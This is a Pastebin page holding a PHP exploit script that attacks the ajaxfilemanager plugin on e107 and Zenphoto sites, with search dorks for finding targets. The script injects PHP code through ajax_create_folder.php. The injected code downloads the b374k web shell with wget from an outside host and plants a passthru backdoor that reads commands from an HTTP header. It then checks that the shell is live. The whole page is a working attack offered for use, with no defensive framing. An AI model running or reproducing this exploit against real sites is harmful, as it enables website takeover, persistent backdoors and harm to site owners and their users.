Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- dork inurl:/e107_plugins/hupsis_media_gallery/FileManager/ajaxfilemanager
- inurl:/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/
- use ur brain :p
- */
- error_reporting(0);
- set_time_limit(0);
- ini_set("default_socket_timeout", 5);
- function http_send($host, $packet)
- {
- if (!($sock = fsockopen($host, 80)))
- die( "\n[-] No response from {$host}:80\n");
- fwrite($sock, $packet);
- return stream_get_contents($sock);
- }
- if ($argc < 3)
- {
- print "\nUsage......: php $argv[0] <host> <ajaxfilemanager_path>\n";
- print "\nExample....: php $argv[0] domain.com /e107_plugins/hupsis_media_gallery/FileManager/ajaxfilemanager/\n";
- die();
- }
- $host = $argv[1];
- $path1 = $argv[2];
- $exploit = "foo=<?php error_reporting(0);print(system('wget https://raw.githubusercontent.com/The404Hacking/b374k-mini/master/b374k.php -O shani.php'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>";
- $packet = "POST {$path1}/ajax_create_folder.php HTTP/1.0\r\n";
- $packet .= "Host: {$host}\r\n";
- $packet .= "Content-Length: ".strlen($exploit)."\r\n";
- $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
- $packet .= "Connection: close\r\n\r\n{$exploit}";
- http_send($host, $packet);
- $packet = "GET {$path1}/inc/data.php HTTP/1.0\r\n";
- $packet .= "Host: {$host}\r\n";
- $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
- $packet .= "Connection: close\r\n\r\n";
- http_send($host, $packet);
- $in = "inc/shani.php";
- $ha = "http://";
- $target = $ha.$host.$path1.$in;
- $cek = file_get_contents($target);
- print "\n[+] Thanks to Unamed48\n";
- if(preg_match("/File upload by unnamed48/", $cek))
- {
- echo "\n\n[+] uploaded XD cek @ http://$host$path1/inc/shani.php\n";
- }
- else {
- echo "\n\n[-] Exploit Failed :(\n";
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement